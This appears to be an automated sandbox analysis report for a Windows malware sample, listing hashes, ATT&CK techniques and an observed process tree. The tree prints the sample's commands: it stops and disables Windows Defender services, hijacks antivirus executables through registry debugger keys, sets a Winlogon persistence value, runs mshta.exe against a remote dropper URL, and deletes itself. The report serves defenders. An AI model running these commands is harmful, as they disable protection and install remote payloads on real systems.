d878785bc3ca5d1436afbee19bf8e015d52806c22cc15906b8222ca69cf2912f

Analysis

max time kernel
150s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14-09-2024 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
Size

1.6MB
MD5

e0a772e3e650391ab54c92c61881493b
SHA1

5e1bd9db61a3b240808f7712a67dc2e82648d281
SHA256

d878785bc3ca5d1436afbee19bf8e015d52806c22cc15906b8222ca69cf2912f
SHA512

03ad7ff09e4208f58e57fe1f94d0869024e13497fbd4194f6c888f7ada78254e0ea8baf079e4c0ce7bfdbb6ab70bc2b721ba9712465ced5beb81a191dc27a6df
SSDEEP

49152:kfPq9jchRQzGOJmkx8lxca5CTcOU7m6kE5N:2Po4ESOJmk8rc1AOU7kQ

Score

10^/10

defense_evasion discovery evasion execution persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://daa2265a99d3e63e.pc-shieldonline.com/favicon.ico?0=106&1=0&2=1&3=102&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=mnlllpiqaq

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\gntknvi.exe"	gntknvi.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe"	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe"	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe"	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe"	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe"	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe"	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe"	gntknvi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe	gntknvi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe"	gntknvi.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Deletes itself 1 IoCs

pid	Process
2752	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2824	gntknvi.exe

Loads dropped DLL 2 IoCs

pid	Process
2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2804	sc.exe
2784	sc.exe
2868	sc.exe
2884	sc.exe
1576	sc.exe
756	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gntknvi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	gntknvi.exe
Token: SeShutdownPrivilege	2824	gntknvi.exe
Token: SeDebugPrivilege	2824	gntknvi.exe
Token: SeShutdownPrivilege	2824	gntknvi.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe
2824	gntknvi.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 1576	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	30
PID 2304 wrote to memory of 1576	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	30
PID 2304 wrote to memory of 1576	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	30
PID 2304 wrote to memory of 1576	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	30
PID 2304 wrote to memory of 756	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	31
PID 2304 wrote to memory of 756	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	31
PID 2304 wrote to memory of 756	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	31
PID 2304 wrote to memory of 756	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	31
PID 2304 wrote to memory of 2052	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	32
PID 2304 wrote to memory of 2052	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	32
PID 2304 wrote to memory of 2052	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	32
PID 2304 wrote to memory of 2052	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	32
PID 2304 wrote to memory of 2804	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	33
PID 2304 wrote to memory of 2804	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	33
PID 2304 wrote to memory of 2804	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	33
PID 2304 wrote to memory of 2804	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	33
PID 2304 wrote to memory of 2824	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	38
PID 2304 wrote to memory of 2824	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	38
PID 2304 wrote to memory of 2824	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	38
PID 2304 wrote to memory of 2824	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	38
PID 2304 wrote to memory of 2752	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	39
PID 2304 wrote to memory of 2752	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	39
PID 2304 wrote to memory of 2752	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	39
PID 2304 wrote to memory of 2752	2304	e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe	39
PID 2052 wrote to memory of 2916	2052	net.exe	40
PID 2052 wrote to memory of 2916	2052	net.exe	40
PID 2052 wrote to memory of 2916	2052	net.exe	40
PID 2052 wrote to memory of 2916	2052	net.exe	40
PID 2824 wrote to memory of 2884	2824	gntknvi.exe	42
PID 2824 wrote to memory of 2884	2824	gntknvi.exe	42
PID 2824 wrote to memory of 2884	2824	gntknvi.exe	42
PID 2824 wrote to memory of 2884	2824	gntknvi.exe	42
PID 2824 wrote to memory of 2868	2824	gntknvi.exe	43
PID 2824 wrote to memory of 2868	2824	gntknvi.exe	43
PID 2824 wrote to memory of 2868	2824	gntknvi.exe	43
PID 2824 wrote to memory of 2868	2824	gntknvi.exe	43
PID 2824 wrote to memory of 1964	2824	gntknvi.exe	44
PID 2824 wrote to memory of 1964	2824	gntknvi.exe	44
PID 2824 wrote to memory of 1964	2824	gntknvi.exe	44
PID 2824 wrote to memory of 1964	2824	gntknvi.exe	44
PID 2824 wrote to memory of 2784	2824	gntknvi.exe	45
PID 2824 wrote to memory of 2784	2824	gntknvi.exe	45
PID 2824 wrote to memory of 2784	2824	gntknvi.exe	45
PID 2824 wrote to memory of 2784	2824	gntknvi.exe	45
PID 1964 wrote to memory of 2664	1964	net.exe	50
PID 1964 wrote to memory of 2664	1964	net.exe	50
PID 1964 wrote to memory of 2664	1964	net.exe	50
PID 1964 wrote to memory of 2664	1964	net.exe	50
PID 2824 wrote to memory of 1932	2824	gntknvi.exe	51
PID 2824 wrote to memory of 1932	2824	gntknvi.exe	51
PID 2824 wrote to memory of 1932	2824	gntknvi.exe	51
PID 2824 wrote to memory of 1932	2824	gntknvi.exe	51

C:\Users\Admin\AppData\Local\Temp\e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\SysWOW64\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:1576
- C:\Windows\SysWOW64\sc.exe
  sc config WinDefend start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:756
- C:\Windows\SysWOW64\net.exe
  net stop msmpsvc
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop msmpsvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
- C:\Windows\SysWOW64\sc.exe
  sc config msmpsvc start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2804
- C:\Users\Admin\AppData\Roaming\Microsoft\gntknvi.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\gntknvi.exe
  2⤵
  - Modifies WinLogon for persistence
  - Event Triggered Execution: Image File Execution Options Injection
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2884
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2868
- - C:\Windows\SysWOW64\net.exe
    net stop msmpsvc
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msmpsvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2664
- - C:\Windows\SysWOW64\sc.exe
    sc config msmpsvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2784
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "http://daa2265a99d3e63e.pc-shieldonline.com/favicon.ico?0=106&1=0&2=1&3=102&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=mnlllpiqaq"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\E0A772~1.EXE" >> NUL
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Roaming\Microsoft\gntknvi.exe

Filesize
1.6MB

MD5
e0a772e3e650391ab54c92c61881493b

SHA1
5e1bd9db61a3b240808f7712a67dc2e82648d281

SHA256
d878785bc3ca5d1436afbee19bf8e015d52806c22cc15906b8222ca69cf2912f

SHA512
03ad7ff09e4208f58e57fe1f94d0869024e13497fbd4194f6c888f7ada78254e0ea8baf079e4c0ce7bfdbb6ab70bc2b721ba9712465ced5beb81a191dc27a6df

Download Submit
memory/2304-4-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2304-37-0x0000000004650000-0x000000000495B000-memory.dmp

Filesize
3.0MB

Download
memory/2304-7-0x0000000003390000-0x0000000003510000-memory.dmp

Filesize
1.5MB

Download
memory/2304-16-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2304-15-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2304-14-0x0000000003380000-0x0000000003382000-memory.dmp

Filesize
8KB

Download
memory/2304-13-0x00000000033E0000-0x00000000033E1000-memory.dmp

Filesize
4KB

Download
memory/2304-12-0x0000000003470000-0x00000000035B0000-memory.dmp

Filesize
1.2MB

Download
memory/2304-11-0x0000000003470000-0x00000000035B0000-memory.dmp

Filesize
1.2MB

Download
memory/2304-10-0x0000000003470000-0x00000000035B0000-memory.dmp

Filesize
1.2MB

Download
memory/2304-9-0x0000000003390000-0x0000000003392000-memory.dmp

Filesize
8KB

Download
memory/2304-8-0x00000000033A0000-0x00000000033A1000-memory.dmp

Filesize
4KB

Download
memory/2304-17-0x00000000033B0000-0x00000000033B1000-memory.dmp

Filesize
4KB

Download
memory/2304-18-0x0000000000710000-0x0000000000770000-memory.dmp

Filesize
384KB

Download
memory/2304-30-0x0000000004650000-0x000000000495B000-memory.dmp

Filesize
3.0MB

Download
memory/2304-2-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/2304-1-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/2304-0-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/2304-5-0x00000000003B0000-0x00000000003B1000-memory.dmp

Filesize
4KB

Download
memory/2304-28-0x0000000000710000-0x0000000000770000-memory.dmp

Filesize
384KB

Download
memory/2304-31-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/2304-3-0x0000000000790000-0x0000000000791000-memory.dmp

Filesize
4KB

Download
memory/2304-29-0x0000000003470000-0x00000000035B0000-memory.dmp

Filesize
1.2MB

Download
memory/2304-33-0x0000000004650000-0x000000000495B000-memory.dmp

Filesize
3.0MB

Download
memory/2304-6-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/2824-35-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download
memory/2824-32-0x0000000000400000-0x000000000070B000-memory.dmp

Filesize
3.0MB

Download